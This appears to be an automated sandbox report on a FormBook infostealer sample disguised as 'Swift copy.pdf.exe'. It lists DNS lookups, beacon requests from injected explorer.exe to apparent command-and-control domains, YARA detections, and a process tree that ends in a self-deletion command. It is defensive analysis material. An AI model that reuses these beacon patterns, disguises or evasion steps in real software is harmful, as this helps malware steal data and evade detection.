Apr 12, 2021 09:16:15.687482119 CEST | 8.8.8.8 | 192.168.2.6 | 0x752e | No error (0) | www.technomark.xyz | technomark.xyz | - | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 09:16:15.687482119 CEST | 8.8.8.8 | 192.168.2.6 | 0x752e | No error (0) | technomark.xyz | - | 174.136.25.55 | A (IP address) | IN (0x0001)
Apr 12, 2021 09:16:21.877540112 CEST | 8.8.8.8 | 192.168.2.6 | 0x3b69 | No error (0) | www.indiafoodtraveling.com | - | 204.11.56.48 | A (IP address) | IN (0x0001)
Apr 12, 2021 09:16:27.634377003 CEST | 8.8.8.8 | 192.168.2.6 | 0xffd4 | No error (0) | www.marktheoilguy.com | marktheoilguy.com | - | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 09:16:27.634377003 CEST | 8.8.8.8 | 192.168.2.6 | 0xffd4 | No error (0) | marktheoilguy.com | - | 184.168.131.241 | A (IP address) | IN (0x0001)

                                                                HTTP Request Dependency Graph

                                                                • www.wapgoals.com
                                                                • www.criticalredux.com
                                                                • www.rileysboutique.com
                                                                • www.agenciaorange.net
                                                                • www.technomark.xyz
                                                                • www.indiafoodtraveling.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49726 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 09:15:16.607167006 CEST | 1667 | OUT | GET /ifne/?AjR=71EtUWdYzxABpFekNdqC6lfpkzJYpQcnmhsYNVCZgcOb/UTZrYaS228nAxG5B59FDGhBRZlxww==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1
Host: www.wapgoals.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 09:15:16.906033039 CEST | 1691 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Mon, 12 Apr 2021 07:15:16 GMT
Content-Type: text/html
Content-Length: 275
ETag: "60733cbf-113"
Via: 1.1 google
Connection: close
                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                1 | 192.168.2.6 | 49733 | 45.33.51.100 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Apr 12, 2021 09:15:22.197308064 CEST | 2275 | OUT | GET /ifne/?AjR=dOs+lg2asUoXBO5EZg435RwPxJJuMD/jvsmygwM2KrqI9lfFwJ6FtdZyv1m6A/DgItG0MeGBng==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1
                                                                Host: www.criticalredux.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:15:22.406625032 CEST | 2276 | IN | HTTP/1.1 302 Found
                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                Date: Mon, 12 Apr 2021 07:15:22 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                status: 302 Found
                                                                cache-control: no-cache
                                                                referrer-policy: strict-origin-when-cross-origin
                                                                x-permitted-cross-domain-policies: none
                                                                x-xss-protection: 1; mode=block
                                                                x-request-id: a007ddf2-61de-4f30-aacd-9fecf27575bf
                                                                location: https://fireside.fm/
                                                                x-download-options: noopen
                                                                x-runtime: 0.006187
                                                                x-frame-options: SAMEORIGIN
                                                                x-content-type-options: nosniff
                                                                x-content-type-options: nosniff
                                                                Data Raw: 35 36 0d 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 73 69 64 65 2e 66 6d 2f 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: 56<html><body>You are being <a href="https://fireside.fm/">redirected</a>.</body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                2 | 192.168.2.6 | 49739 | 74.208.236.87 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Apr 12, 2021 09:15:27.665319920 CEST | 6594 | OUT | GET /ifne/?AjR=zzTxArteMsObKw8PVSTAy3ItaE+XllOQAe/BMiW6EZ4sNP9JkFpsMwiszAJkxQMr59SfztPEEw==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1
                                                                Host: www.rileysboutique.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:15:27.830058098 CEST | 6595 | IN | HTTP/1.1 302 Found
                                                                Content-Type: text/html
                                                                Content-Length: 0
                                                                Connection: close
                                                                Date: Mon, 12 Apr 2021 07:15:27 GMT
                                                                Server: Apache/2.4.10 (Debian)
                                                                Cache-Control: no-cache
                                                                Location: https://rileysboutiqueshop.company.site//ifne/?AjR=zzTxArteMsObKw8PVSTAy3ItaE+XllOQAe/BMiW6EZ4sNP9JkFpsMwiszAJkxQMr59SfztPEEw==&ndndsL=-Zh4XzYxhHVda6t


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                3 | 192.168.2.6 | 49753 | 51.222.80.112 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Apr 12, 2021 09:16:10.229217052 CEST | 6712 | OUT | GET /ifne/?AjR=8GjGM9gH0JgPTr1fPV35mssmA8Ddbt0y6EKlVm4ORHEqitqlBaDBsMKhu0jqcrmxAKX5kfGUAw==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1
                                                                Host: www.agenciaorange.net
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:16:10.371033907 CEST | 6713 | IN | HTTP/1.1 301 Moved Permanently
                                                                Date: Mon, 12 Apr 2021 07:16:10 GMT
                                                                Server: Apache
                                                                Content-Security-Policy: upgrade-insecure-requests;
                                                                Location: https://www.agenciaorange.net/ifne/?AjR=8GjGM9gH0JgPTr1fPV35mssmA8Ddbt0y6EKlVm4ORHEqitqlBaDBsMKhu0jqcrmxAKX5kfGUAw==&ndndsL=-Zh4XzYxhHVda6t
                                                                Content-Length: 351
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 67 65 6e 63 69 61 6f 72 61 6e 67 65 2e 6e 65 74 2f 69 66 6e 65 2f 3f 41 6a 52 3d 38 47 6a 47 4d 39 67 48 30 4a 67 50 54 72 31 66 50 56 33 35 6d 73 73 6d 41 38 44 64 62 74 30 79 36 45 4b 6c 56 6d 34 4f 52 48 45 71 69 74 71 6c 42 61 44 42 73 4d 4b 68 75 30 6a 71 63 72 6d 78 41 4b 58 35 6b 66 47 55 41 77 3d 3d 26 61 6d 70 3b 6e 64 6e 64 73 4c 3d 2d 5a 68 34 58 7a 59 78 68 48 56 64 61 36 74 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.agenciaorange.net/ifne/?AjR=8GjGM9gH0JgPTr1fPV35mssmA8Ddbt0y6EKlVm4ORHEqitqlBaDBsMKhu0jqcrmxAKX5kfGUAw==&amp;ndndsL=-Zh4XzYxhHVda6t">here</a>.</p></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                4 | 192.168.2.6 | 49754 | 174.136.25.55 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Apr 12, 2021 09:16:15.850569963 CEST | 6714 | OUT | GET /ifne/?AjR=rtUU9PmTXQaf/wGdlMxfwAVfjNGr3c9lw0dfQP58ZOH4+/gv/3vAFDrG/mXph96X+27XXnGiag==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1
                                                                Host: www.technomark.xyz
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:16:20.034461975 CEST | 6715 | IN | HTTP/1.1 301 Moved Permanently
                                                                Date: Mon, 12 Apr 2021 07:16:15 GMT
                                                                Server: Apache
                                                                X-Powered-By: PHP/7.4.16
                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                X-Redirect-By: WordPress
                                                                Upgrade: h2,h2c
                                                                Connection: Upgrade, close
                                                                Location: http://technomark.xyz/ifne/?AjR=rtUU9PmTXQaf/wGdlMxfwAVfjNGr3c9lw0dfQP58ZOH4+/gv/3vAFDrG/mXph96X+27XXnGiag==&ndndsL=-Zh4XzYxhHVda6t
                                                                Content-Length: 0
                                                                Content-Type: text/html; charset=UTF-8


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                5 | 192.168.2.6 | 49755 | 204.11.56.48 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Apr 12, 2021 09:16:22.041131020 CEST | 6716 | OUT | GET /ifne/?AjR=uTh+jOJLcZ1+A+ZwJUR1QlGf4dkpQViro8P/md11fzExOFziGJv9l1WMjbCU3sRscsfoVkwx1Q==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1
                                                                Host: www.indiafoodtraveling.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:16:22.350006104 CEST | 6718 | IN | HTTP/1.1 200 OK
                                                                Date: Mon, 12 Apr 2021 07:16:22 GMT
                                                                Server: Apache
                                                                Set-Cookie: vsid=918vr3657573821812533; expires=Sat, 11-Apr-2026 07:16:22 GMT; Max-Age=157680000; path=/; domain=www.indiafoodtraveling.com; HttpOnly
                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_IRV7pOc0Xm/9416N7uYXLSgtMDYU4DL2U8RHP9DMTpfL2oM/3OsPGmGbiO5yvU1LU4WYCsGVV53fEp5zRzdaiQ==
                                                                Keep-Alive: timeout=5, max=115
                                                                Connection: Keep-Alive
                                                                Transfer-Encoding: chunked
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 35 65 33 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 64 69 61 66 6f 6f 64 74 72 61 76 65 6c 69 6e 67 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 64 69 61 66 6f 6f 64 74 72 61 76 65 6c 69 6e 67 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 64 69 61 66 6f 6f 64 74 72 61 76 65 6c 69 6e 67 2e 63 6f 6d 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68 70 3f 61 3d 4f 48 70 6b 55 6b 49 30 59 30 51 78 55 57 52 6a 55 6e 56 42 56 32 38 34 61 48 42 77 63 6a 51 32 52 6d 56 6b 5a 6c 68 4e 59 55 35 59 65 45 63 79 4d 7a 56 47 5a 6d 35 52 63 46 70 78 
65 55 4e 47 56 58 45 72 57 54 6c 35 4e 48 5a 52 64 32 39 45 55 32 6c 75 57 6b 77 79 61 32 52 59 61 7a 64 31 53 7a 4e 49 4e 33 4a 69 62 47 67 30 65 6b 31 6c 54 54 64 71 55 46 42 50 57 54 45 31 63 6a 46 35 53 33 70 42 55 6a 56 4c 4c 31 46 74 57 46 55 39 26 62 3d 22 2b 61 62 70 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e
                                                                Data Ascii: 5e38<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.indiafoodtraveling.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.indiafoodtraveling.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0px";imglog.src="http://www.indiafoodtraveling.com/sk-logabpstatus.php?a=OHpkUkI0Y0QxUWRjUnVBV284aHBwcjQ2RmVkZlhNYU5YeEcyMzVGZm5RcFpxeUNGVXErWTl5NHZRd29EU2luWkwya2RYazd1SzNIN3JibGg0ek1lTTdqUFBPWTE1cjF5S3pBUjVLL1FtWFU9&b="+abp;document.body.


                                                                Code Manipulations

                                                                Statistics

                                                                Behavior

                                                                System Behavior

                                                                General

                                                                Start time:09:14:18
                                                                Start date:12/04/2021
                                                                Path:C:\Users\user\Desktop\Swift copy.pdf.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\Desktop\Swift copy.pdf.exe'
                                                                Imagebase:0x1c0000
                                                                File size:846848 bytes
                                                                MD5 hash:5946D0EE4BECB515A1CF39EF3F3DDE56
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmp, Author: Joe Security
                                                                Reputation:low

                                                                General

                                                                Start time:09:14:28
                                                                Start date:12/04/2021
                                                                Path:C:\Users\user\Desktop\Swift copy.pdf.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Users\user\Desktop\Swift copy.pdf.exe
                                                                Imagebase:0x110000
                                                                File size:846848 bytes
                                                                MD5 hash:5946D0EE4BECB515A1CF39EF3F3DDE56
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low

                                                                General

                                                                Start time:09:14:29
                                                                Start date:12/04/2021
                                                                Path:C:\Users\user\Desktop\Swift copy.pdf.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\Desktop\Swift copy.pdf.exe
                                                                Imagebase:0x500000
                                                                File size:846848 bytes
                                                                MD5 hash:5946D0EE4BECB515A1CF39EF3F3DDE56
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:low

                                                                General

                                                                Start time:09:14:31
                                                                Start date:12/04/2021
                                                                Path:C:\Windows\explorer.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:
                                                                Imagebase:0x7ff6f22f0000
                                                                File size:3933184 bytes
                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:09:14:45
                                                                Start date:12/04/2021
                                                                Path:C:\Windows\SysWOW64\autoconv.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                                Imagebase:0xbb0000
                                                                File size:851968 bytes
                                                                MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

                                                                General

                                                                Start time:09:14:46
                                                                Start date:12/04/2021
                                                                Path:C:\Windows\SysWOW64\cscript.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\cscript.exe
                                                                Imagebase:0x30000
                                                                File size:143360 bytes
                                                                MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:moderate

                                                                General

                                                                Start time:09:14:49
                                                                Start date:12/04/2021
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:/c del 'C:\Users\user\Desktop\Swift copy.pdf.exe'
                                                                Imagebase:0x2a0000
                                                                File size:232960 bytes
                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:09:14:50
                                                                Start date:12/04/2021
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff61de10000
                                                                File size:625664 bytes
                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Disassembly

                                                                Code Analysis
